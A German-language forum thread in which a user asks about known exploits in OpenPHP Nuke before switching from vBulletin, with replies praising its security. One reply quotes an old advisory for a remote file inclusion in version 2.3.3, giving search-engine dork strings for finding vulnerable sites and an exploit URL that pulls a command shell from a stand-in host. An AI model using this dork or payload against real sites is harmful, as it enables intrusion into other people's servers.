Forum

Tach !

Denke gerade drüber nach von Vbulletin auf OpenPHP Nuke umzusteigen und frage mich inwieweit es da mit der Sicherheit ist.

Sind irgendwelche Exploits bekannt oder gibts eine Liste derer ?

Grüße

Es gibt keine Exploits. Soweit ich weiß, ist bei vernünftiger Serverkonfiguration und vernünftiger OPN Konfiguration zur Zeit kein eindringen möglich.
Sollte doch eine Schwachstelle bekannt werden, so wird diese sofort korrigiert. OPN ist meines erachtens das CMS, was den höchsten Wert auf Sicherheit legt.

Danke, aber das denkt VBulletin auch. (Auch wenns kein CMS in dem Sinne ist :d)

Naja ich teste datt mal, danke für die Antwort :d

Im 2006 gab es ein Exploit. Das ist aber auch das einzige wo bekannt ist.
Der Bug war damals in der Version 2.3.3

Title: OpenPHPNuke <= 2.3.3 Remote File Inclusion
URL: http://www.openphpnuke.com/
Dork: inurl:/system/article/alltopics.php OR inurl:/system/user/index.php
Credits: [Oo]

Exploit: /master.php?root_path=http://yourhost/cmd.gif?cmd=ls

Das CMS hat mir der EVA ein ausgeklügelter Sicherheitsmechanismus für Angriff aller Art.


Flash

EVA = Eingabe/Verarbeitung/Ausgabe ?
Oder ist das ein spezieller Scriptbestandteil des CMS ?

Klingt interessant

Schau mal hier den Thread zur EVA an.

Werde schauen, dass die Customizer Module demnächst in der Doku stehen.

Flash

Nett, Danke das schau ich mir mal an !!

..Sobald meine 16094 files per SFTP endlich aufm US-Host sind
(t- 2:00 - 4:00 h)